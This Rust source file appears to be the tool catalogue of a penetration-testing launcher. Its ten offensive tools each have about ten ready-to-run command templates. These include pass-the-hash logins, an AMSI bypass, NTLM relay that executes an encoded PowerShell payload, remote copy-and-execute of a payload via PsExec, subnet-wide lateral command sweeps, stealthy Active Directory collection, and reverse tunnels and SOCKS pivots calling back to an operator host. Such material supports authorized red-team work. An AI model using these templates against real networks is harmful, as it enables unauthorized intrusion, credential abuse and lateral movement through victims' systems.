use crate::tools::types::{Tool, Mode, InputKind, OutputFormat};

pub const TOOLS: &[Tool] = &[
    Tool {
        name: "Evil-WinRM",
        binary: "evil-winrm",
        description: "Ultimate WinRM shell for Windows remote management exploitation.",
        modes: &[
            Mode {
                name: "Basic Connection",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Hash Auth",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -H {ntlm_hash} > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Hash],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSL Connection",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} -S > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Certificate Auth",
                cmd_template: r#"evil-winrm -i {target_ip} -c {cert_pem} -k {key_pem} > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Custom("Cert Pem", "cert_pem"), InputKind::Custom("Key Pem", "key_pem")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Upload",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} -s {local_file} -d {remote_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password, InputKind::Custom("Local File", "local_file"), InputKind::Custom("Remote Path", "remote_path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Script Loading",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} -s {ps1_script} > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password, InputKind::Custom("Ps1 Script", "ps1_script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "AMSI Bypass",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} -a > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Service Enum",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} -c "Get-Service \| Where-Object {\$_.Status -eq 'Running'}" > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Menu Mode",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Session",
                cmd_template: r#"evil-winrm -i {target_ip} -u {username} -p {password} -S -a -s {ps_script} > {output_file}"#,
                inputs: &[InputKind::Custom("Target Ip", "target_ip"), InputKind::Username, InputKind::Password, InputKind::Custom("Ps Script", "ps_script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "NetExec (NXC)",
        binary: "nxc",
        description: "Multi-protocol network exploitation for SMB, WinRM, LDAP, MSSQL, SSH.",
        modes: &[
            Mode {
                name: "SMB Command",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} -x 'whoami' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "PS Execution",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} -X 'Get-Process' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Pass-the-Hash",
                cmd_template: r#"nxc smb {targets} -u {user} -H {hash} -x 'whoami' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Hash],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WinRM Exec",
                cmd_template: r#"nxc winrm {targets} -u {user} -p {password} -x 'hostname' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "MSSQL Command",
                cmd_template: r#"nxc mssql {targets} -u {user} -p {password} -x 'whoami' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Spider Shares",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} -M spider_plus > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WMI Query",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} --wmi 'SELECT * FROM Win32_Process' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Local Auth",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} --local-auth > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Kerberos Auth",
                cmd_template: r#"nxc smb {targets} -u {user} -p {password} -k --use-kcache > {output_file}"#,
                inputs: &[InputKind::Custom("Targets", "targets"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Lateral Sweep",
                cmd_template: r#"nxc smb {cidr} -u {user} -p {password} -x 'whoami' --continue-on-success > {output_file}"#,
                inputs: &[InputKind::Ip, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Impacket Suite",
        binary: "smbexec.py",
        description: "Python network protocol classes for lateral movement.",
        modes: &[
            Mode {
                name: "SMBExec Shell",
                cmd_template: r#"smbexec.py {domain}/{user}:{password}@{target} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WMIExec",
                cmd_template: r#"wmiexec.py {domain}/{user}:{password}@{target} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "PSExec",
                cmd_template: r#"psexec.py {domain}/{user}:{password}@{target} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LDAP Dump",
                cmd_template: r#"ldapdomaindump -u {domain}\\{user} -p {password} {dc_ip} -o {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Pass-the-Hash",
                cmd_template: r#"wmiexec.py -hashes {lmhash}:{nthash} {domain}/{user}@{target} > {output_file}"#,
                inputs: &[InputKind::Custom("Lmhash", "lmhash"), InputKind::Custom("Nthash", "nthash"), InputKind::Domain, InputKind::Username, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "NTLM Relay",
                cmd_template: r#"ntlmrelayx.py -tf {targets_file} -smb2support -c 'whoami' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets File", "targets_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Lookupsid",
                cmd_template: r#"lookupsid.py {domain}/{user}:{password}@{target} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Atexec",
                cmd_template: r#"atexec.py {domain}/{user}:{password}@{target} 'whoami' > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Dcomexec",
                cmd_template: r#"dcomexec.py {domain}/{user}:{password}@{target} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Protocol Suite",
                cmd_template: r#"wmiexec.py {creds}@{target} && smbexec.py {creds}@{target} && psexec.py {creds}@{target} > {output_file}"#,
                inputs: &[InputKind::Custom("Creds", "creds"), InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "BloodHound",
        binary: "SharpHound.exe",
        description: "Graph-based Active Directory attack path analysis.",
        modes: &[
            Mode {
                name: "Data Collection",
                cmd_template: r#"SharpHound.exe -c All --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "DCOnly",
                cmd_template: r#"SharpHound.exe -c DCOnly --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Session Collection",
                cmd_template: r#"SharpHound.exe -c Session --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "ACL Collection",
                cmd_template: r#"SharpHound.exe -c ACL --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Python Collector",
                cmd_template: r#"bloodhound.py -u {user} -p {password} -d {domain} -c All -o {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Password, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Collection Loop",
                cmd_template: r#"SharpHound.exe --loop --loopduration 01:00:00 --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Trust Collection",
                cmd_template: r#"SharpHound.exe -c Trusts --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Group Policy",
                cmd_template: r#"SharpHound.exe -c GPOLocalGroup --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Stealth Collection",
                cmd_template: r#"SharpHound.exe -c DCOnly,Session --exclude-dc {dc_name} --zipfilename {output_file}"#,
                inputs: &[InputKind::Custom("Dc Name", "dc_name")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full AD Audit",
                cmd_template: r#"SharpHound.exe -c All --collectallproperties --zipfilename {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
        ],
    },
    Tool {
        name: "PsExec (Sysinternals)",
        binary: "psexec.exe",
        description: "Microsoft's legitimate remote execution tool for SYSTEM access.",
        modes: &[
            Mode {
                name: "Remote Shell",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} cmd.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "System Shell",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -s cmd.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Single Command",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -s hostname > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Copy & Execute",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -c {local_exe} > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password, InputKind::Custom("Local Exe", "local_exe")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "User Session",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -i {session} notepad.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password, InputKind::Session],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Network Batch",
                cmd_template: r#"psexec.exe @{targets_file} -u {user} -p {password} -s cmd /c 'systeminfo' > {output_file}"#,
                inputs: &[InputKind::Custom("Targets File", "targets_file"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "No Profile",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -e cmd.exe > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Timeout",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -n 10 whoami > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Hash Auth",
                cmd_template: r#"psexec.py {domain}/{user}@{target} -hashes {lmhash}:{nthash} > {output_file}"#,
                inputs: &[InputKind::Domain, InputKind::Username, InputKind::Target, InputKind::Custom("Lmhash", "lmhash"), InputKind::Custom("Nthash", "nthash")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Remote Admin",
                cmd_template: r#"psexec.exe \\{target} -u {user} -p {password} -s -c -f {payload} -d > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Username, InputKind::Password, InputKind::Payload],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Ligolo-ng",
        binary: "./proxy",
        description: "Advanced tunneling with TUN interface for transparent network pivoting.",
        modes: &[
            Mode {
                name: "Proxy Start",
                cmd_template: r#"./proxy -selfcert -laddr 0.0.0.0:{lport} > {output_file}"#,
                inputs: &[InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Agent Connect",
                cmd_template: r#"./agent -connect {lhost}:{lport} -ignore-cert > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "TUN Setup",
                cmd_template: r#"sudo ip tuntap add user $(whoami) mode tun ligolo && sudo ip link set ligolo up > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Route Add",
                cmd_template: r#"sudo ip route add {internal_subnet}/24 dev ligolo > {output_file}"#,
                inputs: &[InputKind::Custom("Internal Subnet", "internal_subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Tunnel Start",
                cmd_template: r#"session -> tunnel_start > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Listener Add",
                cmd_template: r#"listener_add -addr 0.0.0.0:{port} -to 127.0.0.1:{port} -bind > {output_file}"#,
                inputs: &[InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Multi-hop Pivot",
                cmd_template: r#"session -> tunnel_start -> agent -> connect {next_hop} > {output_file}"#,
                inputs: &[InputKind::Custom("Next Hop", "next_hop")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Autoroute",
                cmd_template: r#"session -> tunnel_start -> add_route {subnet} > {output_file}"#,
                inputs: &[InputKind::Custom("Subnet", "subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Port Forward",
                cmd_template: r#"listener_add -addr 0.0.0.0:{port} -to {internal_ip}:{port} > {output_file}"#,
                inputs: &[InputKind::Ports, InputKind::Custom("Internal Ip", "internal_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Pivot Chain",
                cmd_template: r#"proxy -> agent -> tunnel_start -> add_route -> listener_add > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Chisel",
        binary: "chisel",
        description: "Fast TCP/UDP tunnel over HTTP for SOCKS5 proxy and port forwarding.",
        modes: &[
            Mode {
                name: "Server Start",
                cmd_template: r#"chisel server -p {port} --reverse > {output_file}"#,
                inputs: &[InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Client Connect",
                cmd_template: r#"chisel client http://{lhost}:{lport} {local_port}:{remote_host}:{remote_port} > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport, InputKind::Custom("Local Port", "local_port"), InputKind::Custom("Remote Host", "remote_host"), InputKind::Custom("Remote Port", "remote_port")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Reverse SOCKS",
                cmd_template: r#"chisel client http://{lhost}:{lport} R:socks > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Forward SOCKS",
                cmd_template: r#"chisel client http://{lhost}:{lport} socks > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Multi Forward",
                cmd_template: r#"chisel client http://{lhost}:{lport} 3000:10.0.0.1:3000 3389:10.0.0.2:3389 > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Auth Protection",
                cmd_template: r#"chisel server -p {port} --auth {user}:{password} --reverse > {output_file}"#,
                inputs: &[InputKind::Ports, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "UDP Forwarding",
                cmd_template: r#"chisel client http://{lhost}:{lport} udp://53:10.0.0.1:53 > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Fingerprint",
                cmd_template: r#"chisel client --fingerprint '{hash}' http://{lhost}:{lport} {ports} > {output_file}"#,
                inputs: &[InputKind::Hash, InputKind::Lhost, InputKind::Lport, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Header Auth",
                cmd_template: r#"chisel client --header 'X-Auth={token}' http://{lhost}:{lport} {ports} > {output_file}"#,
                inputs: &[InputKind::Custom("Token", "token"), InputKind::Lhost, InputKind::Lport, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Tunnel",
                cmd_template: r#"chisel server -p 443 --auth u:p --reverse --socks5 && chisel client --auth u:p https://{lhost} R:socks > {output_file}"#,
                inputs: &[InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Proxychains",
        binary: "proxychains",
        description: "Force TCP connections through SOCKS/HTTP proxies.",
        modes: &[
            Mode {
                name: "SOCKS5 Nmap",
                cmd_template: r#"proxychains nmap -sT -Pn {internal_subnet} > {output_file}"#,
                inputs: &[InputKind::Custom("Internal Subnet", "internal_subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "RDP Through Proxy",
                cmd_template: r#"proxychains xfreerdp /u:{user} /p:{password} /v:{internal_ip} > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Password, InputKind::Custom("Internal Ip", "internal_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSH via Proxy",
                cmd_template: r#"proxychains ssh {user}@{internal_ip} > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Internal Ip", "internal_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "HTTP Access",
                cmd_template: r#"proxychains curl http://{internal_ip}:8080 > {output_file}"#,
                inputs: &[InputKind::Custom("Internal Ip", "internal_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DNS Override",
                cmd_template: r#"proxychains -q nmap --dns-servers {dns_ip} -sT {target} > {output_file}"#,
                inputs: &[InputKind::Custom("Dns Ip", "dns_ip"), InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Metasploit Route",
                cmd_template: r#"proxychains msfconsole -r {resource_script} > {output_file}"#,
                inputs: &[InputKind::Custom("Resource Script", "resource_script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Multi-proxy",
                cmd_template: r#"proxychains -f {config_file} {command} > {output_file}"#,
                inputs: &[InputKind::File, InputKind::Custom("Command", "command")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Quiet Mode",
                cmd_template: r#"proxychains -q {command} > {output_file}"#,
                inputs: &[InputKind::Custom("Command", "command")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SMB Enum",
                cmd_template: r#"proxychains crackmapexec smb {internal_subnet} -u {user} -p {password} > {output_file}"#,
                inputs: &[InputKind::Custom("Internal Subnet", "internal_subnet"), InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Internal Scan",
                cmd_template: r#"proxychains nmap -sT -Pn -p 22,80,443,445,3389,5985 {internal_subnet} > {output_file}"#,
                inputs: &[InputKind::Custom("Internal Subnet", "internal_subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "sshuttle",
        binary: "sshuttle",
        description: "Transparent VPN over SSH for network pivoting.",
        modes: &[
            Mode {
                name: "Full Tunnel",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} {internal_subnet}/24 > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Custom("Internal Subnet", "internal_subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DNS Forward",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} {internal_subnet}/24 --dns > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Custom("Internal Subnet", "internal_subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Listen All",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} {internal_subnet}/24 -l 0.0.0.0 > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Custom("Internal Subnet", "internal_subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Auto Hosts",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} {internal_subnet}/24 --auto-hosts --dns > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Custom("Internal Subnet", "internal_subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Exclude Routes",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} -x {excluded_subnet} {subnet}/24 > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Custom("Excluded Subnet", "excluded_subnet"), InputKind::Custom("Subnet", "subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Daemon Mode",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} {subnet}/24 --daemon > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Custom("Subnet", "subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Key Auth",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} -e 'ssh -i {key}' {subnet}/24 > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Custom("Key", "key"), InputKind::Custom("Subnet", "subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom Port",
                cmd_template: r#"sshuttle -r {user}@{pivot_host}:{port} {subnet}/24 > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host"), InputKind::Ports, InputKind::Custom("Subnet", "subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Auto-nets",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} --auto-nets > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full VPN",
                cmd_template: r#"sshuttle -r {user}@{pivot_host} --dns --auto-hosts --auto-nets -D > {output_file}"#,
                inputs: &[InputKind::Username, InputKind::Custom("Pivot Host", "pivot_host")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "ntlmrelayx.py",
        binary: "ntlmrelayx.py",
        description: "NTLM relay attack tool for SMB, HTTP, LDAP, MSSQL relaying.",
        modes: &[
            Mode {
                name: "SMB Relay",
                cmd_template: r#"ntlmrelayx.py -tf {targets_file} -smb2support > {output_file}"#,
                inputs: &[InputKind::Custom("Targets File", "targets_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Command Exec",
                cmd_template: r#"ntlmrelayx.py -t {target} -c 'whoami /all' -smb2support > {output_file}"#,
                inputs: &[InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LDAP Dump",
                cmd_template: r#"ntlmrelayx.py -t ldap://{dc_ip} --no-da --no-acl > {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "LDAP Account",
                cmd_template: r#"ntlmrelayx.py -t ldap://{dc_ip} --add-computer {computer_name} > {output_file}"#,
                inputs: &[InputKind::Custom("Dc Ip", "dc_ip"), InputKind::Custom("Computer Name", "computer_name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "HTTP Server",
                cmd_template: r#"ntlmrelayx.py -t {target} --serve-image {image} -smb2support > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Custom("Image", "image")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WPAD Attack",
                cmd_template: r#"ntlmrelayx.py -tf {targets_file} -w -l {output_file}"#,
                inputs: &[InputKind::Custom("Targets File", "targets_file")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "IPv6 DNS",
                cmd_template: r#"ntlmrelayx.py -t {target} -6 -wh {domain} -l {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Domain],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "SOCKS Proxy",
                cmd_template: r#"ntlmrelayx.py -tf {targets_file} -socks -smb2support > {output_file}"#,
                inputs: &[InputKind::Custom("Targets File", "targets_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Output",
                cmd_template: r#"ntlmrelayx.py -t {target} -of {output_file} -smb2support"#,
                inputs: &[InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Relay Chain",
                cmd_template: r#"ntlmrelayx.py -tf {targets_file} -c 'powershell -enc {payload}' -smb2support -l {output_file}"#,
                inputs: &[InputKind::Custom("Targets File", "targets_file"), InputKind::Payload],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
        ],
    },
];
